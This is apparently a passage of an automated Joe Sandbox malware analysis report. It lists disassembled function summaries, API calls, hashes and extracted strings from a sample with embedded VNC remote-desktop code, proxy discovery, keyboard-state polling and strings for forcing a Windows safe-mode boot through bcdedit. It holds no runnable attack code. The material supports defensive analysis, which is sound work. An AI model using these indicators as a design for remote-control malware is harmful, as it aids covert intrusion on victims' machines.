                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B9753D
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B97557
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B97571
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B9758B
                                                                              • Part of subcall function 00007FF6C2B974C0: TryEnterCriticalSection.KERNEL32 ref: 00007FF6C2B975D6
                                                                              • Part of subcall function 00007FF6C2B974C0: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2B9760F
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: State$CriticalSection$EnterKeyboardLeave
                                                                            • String ID:
                                                                            • API String ID: 4104749118-0
                                                                            • Opcode ID: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
                                                                            • Instruction ID: 5f657f8f6f2592df1fb6c294d44ff608e602e194a1d7207c0ab852e4248413a5
                                                                            • Opcode Fuzzy Hash: 0256701cad5363ec1328f5542e36a1f7f43bbe659b594c5479dffbbec42ae8d9
                                                                            • Instruction Fuzzy Hash: E3F0BE61A1858081E2749B22E8253B6B2A0FF8974EF484231DECC467A6CF6CE569DA00
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Delete$CloseHandleObject$CriticalEventSectionThreadfree$FreeLibraryMessagePostReleaseSingleSleepTerminateWait
                                                                            • String ID: 2$vncdesktop.cpp : Desktop thread running, force close $vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : ~vncDesktop $vncdesktop.cpp : ~vncDesktop Shutdown()$vncdesktop.cpp : ~vncDesktop m_lGridsList.clear$vncdesktop.cpp : ~vncDesktop:: second request to close InitWindowthread
                                                                            • API String ID: 2560957196-1231019345
                                                                            • Opcode ID: d3761e2cde1ec7064ee2b6525e6bdb12875f7b6778e20ecae9fde7fdee8a08df
                                                                            • Instruction ID: bc428c38b6c9051a379e209dfdb8c1561de1eb1382e2b5efd89688884457690c
                                                                            • Opcode Fuzzy Hash: d3761e2cde1ec7064ee2b6525e6bdb12875f7b6778e20ecae9fde7fdee8a08df
                                                                            • Instruction Fuzzy Hash: D0B17922A08A8285EB60DF61D8905F93360FF81B8EF444432DE8E97BA5CFBCE555D350
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DCE1
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DCFD
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD0F
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD26
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD2F
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD46
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD4F
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD66
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD6F
                                                                            • GetProcAddress.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD8E
                                                                            • EncodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DD97
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DDCA
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DDDA
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DE30
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DE51
                                                                            • DecodePointer.KERNEL32(?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C4DE6B
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                            • API String ID: 2643518689-564504941
                                                                            • Opcode ID: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                                            • Instruction ID: 9853199134b4347de50b38c53f1280b2c8f165eb6726e2e8d6cd933c6ae22bd7
                                                                            • Opcode Fuzzy Hash: 3f01601e3236801bc7f61e640a5cdc001557def2435a7818b715a9f11b20129c
                                                                            • Instruction Fuzzy Hash: 67510428A0AB4381FED4EF51B85417523B4BF59B9EF440575DE8E833A0EFBCE8559240
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
                                                                            • String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
                                                                            • API String ID: 3746257916-1709497384
                                                                            • Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                            • Instruction ID: 82ce3254abdbc6cd6210a73f372ac3551fa451592263af9b772b1b594a3def66
                                                                            • Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                            • Instruction Fuzzy Hash: 14710D35A19A8699E750CF64E8806E933B0FB08369F405636EBAD877D4DFBCD129C740
                                                                            APIs
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$CombineCreateOffsetRect
                                                                            • String ID:
                                                                            • API String ID: 960235054-0
                                                                            • Opcode ID: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
                                                                            • Instruction ID: fe91537b621a4bf3816e5efd535b068ff13ad541c542ff6edd5beed199bd1d17
                                                                            • Opcode Fuzzy Hash: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
                                                                            • Instruction Fuzzy Hash: B5913936B08A4296EB60DF62E8546AD7370FB99B8DF408031DF8E97B55DF68E505C340
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
                                                                            • String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
                                                                            • API String ID: 3443580464-3826360582
                                                                            • Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                            • Instruction ID: 81598ef48449ba2cf19942446147cc816c2ea4ffb4ac53156d2c9a244aad4ce7
                                                                            • Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                            • Instruction Fuzzy Hash: B2610C35A15A8699E750CF64E8846E933B0FB0836DF401636EBAD86BD8DFBCD119C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
                                                                            • String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
                                                                            • API String ID: 3955186772-955988753
                                                                            • Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                            • Instruction ID: 73fe71a9a1ce86dd947385f7fc6f1dba7fffa8a646d1b9104c2f234f3eaeca05
                                                                            • Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                            • Instruction Fuzzy Hash: BCB19C25A18A8381EA51DF34A4802F967A1FF4679EF548636EE8D87BC5DFACD509C300
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo_wsopen_s
                                                                            • String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
                                                                            • API String ID: 2053332431-1561892669
                                                                            • Opcode ID: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                                            • Instruction ID: 978ec0c613b0ade723e5251a69efeb3a4343e9dac628ae0d365f4f874297c810
                                                                            • Opcode Fuzzy Hash: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                                            • Instruction Fuzzy Hash: 4671BCA2E0C20241FBF65E25AD9437B1AF26F1175EF585631CFCE867C9DEACE9408600
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Item$MessageSend$_snprintf$InfoScrollText
                                                                            • String ID: <%s>: $MS Sans Serif
                                                                            • API String ID: 1140286628-959951747
                                                                            • Opcode ID: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                                            • Instruction ID: 37380139705b4b08e2508e7d3673ba534a3d4d4c4ec7ce4bd68c0551a0a32fb7
                                                                            • Opcode Fuzzy Hash: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                                            • Instruction Fuzzy Hash: 60917B62A08A5286E750CF65E8406A937B1FB98B8DF004235DF8D97B68CFBCD595C340
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
                                                                            • String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
                                                                            • API String ID: 3199031719-36275550
                                                                            • Opcode ID: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                            • Instruction ID: 46c33732a7e9ddfe81e61c45bdc676dfd2b02de0e599521501dab0277be8283b
                                                                            • Opcode Fuzzy Hash: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                            • Instruction Fuzzy Hash: 39511721A09B4286EB94DF21A8542B973A0FF88B8EF444535EE8E87765DFBCE545C700
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2315031519-0
                                                                            • Opcode ID: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                                            • Instruction ID: 255a8f8942048ce45477fb6476327c372e09ddeaba20896d4ecf2eedb2c74c25
                                                                            • Opcode Fuzzy Hash: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                                            • Instruction Fuzzy Hash: C0B14832A0865286E7A49F25E45217EB7B0FB84B5AF504135EBCD83B94DFBCE460CB11
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                                            • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                                            • API String ID: 3943905059-2958163836
                                                                            • Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                            • Instruction ID: d1583f12ebc5535dbbe6905f06d0a9bd1de0ddc822962c71d4d3c2ecde5d0203
                                                                            • Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                            • Instruction Fuzzy Hash: 66413935A08A8286E7509F60E8447FA6365FF8574EF884432CE8D973A9DFBCE149C350
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteIconInfoObject
                                                                            • String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
                                                                            • API String ID: 2689914137-3853778978
                                                                            • Opcode ID: 07e0550d49a1be20bf1bf2cec04459e0c3bbd83d3f4aa2a3eb294f96f2703f77
                                                                            • Instruction ID: e5e4c341ce159823796116a921d798d28aae52b3b49adb590edb42d00a2096ff
                                                                            • Opcode Fuzzy Hash: 07e0550d49a1be20bf1bf2cec04459e0c3bbd83d3f4aa2a3eb294f96f2703f77
                                                                            • Instruction Fuzzy Hash: 7E917E72B086828AEB60DF61A4803B963A4FB45B8EF404435DE8DD7B95DFBCE545C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Global$Lock$AllocFreemalloc
                                                                            • String ID: Unable to allocate memory in zip dll
                                                                            • API String ID: 105282483-1808592719
                                                                            • Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                            • Instruction ID: 6f3615644345af66a0bd1b2bcc3298f3a21228786223cdd0f0b4cb157e68dee1
                                                                            • Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                            • Instruction Fuzzy Hash: DF71273AA09B8286EA45CF65E4502B933A4FF59B8EF048536CE8D87365DF7CE4418350
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Delete$Object$CloseDesktopMessagePostRelease
                                                                            • String ID: vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hmemdc$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to DeleteObject$vncdesktop.cpp : failed to close desktop$vncdesktopsink.cpp : ShutdownInitWindowthread
                                                                            • API String ID: 4267955742-668190334
                                                                            • Opcode ID: 1ff92f652932cc3e318c67025513c794b83a66298c3f6cc6a979c7f0a12e43a6
                                                                            • Instruction ID: 9e93b8aa46f49d3004cbf240ee342817dcb724c7ae26cddaba3db7b30af05f93
                                                                            • Opcode Fuzzy Hash: 1ff92f652932cc3e318c67025513c794b83a66298c3f6cc6a979c7f0a12e43a6
                                                                            • Instruction Fuzzy Hash: F4715536A08AC285EB649FA5E8402EA3364FF45B8EF444436CE8D87B59CFBDE155D310
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CreateTime$CloseHandleSize$CompareMappingView
                                                                            • String ID: c:\video0.dat$c:\video1.dat$videodriver.cpp : Error video.dat
                                                                            • API String ID: 286203867-3102623397
                                                                            • Opcode ID: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                                            • Instruction ID: 76b1a59558cd5354a0aba5f4990c88c403c0352b08f6477eb5e758637de587cf
                                                                            • Opcode Fuzzy Hash: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                                            • Instruction Fuzzy Hash: 1F51E431A0864285EB609F15A50067973B1AF96BBEF480331CEBC837E0DEBCE459C300
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Object$Select$CreateDelete$BrushClipCompatibleEmptyFileModuleNameRectSolidStretch
                                                                            • String ID: $!
                                                                            • API String ID: 844750580-2056089098
                                                                            • Opcode ID: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                                            • Instruction ID: b72a663789cbc17a9f4bdc10ec6be0ecf4bdf640eb5336181322c461780df6e6
                                                                            • Opcode Fuzzy Hash: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                                            • Instruction Fuzzy Hash: 4541433560C78286EBA0DF11A85436A77A0FF89B9AF044135DE9E87B94DF7CE444DB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
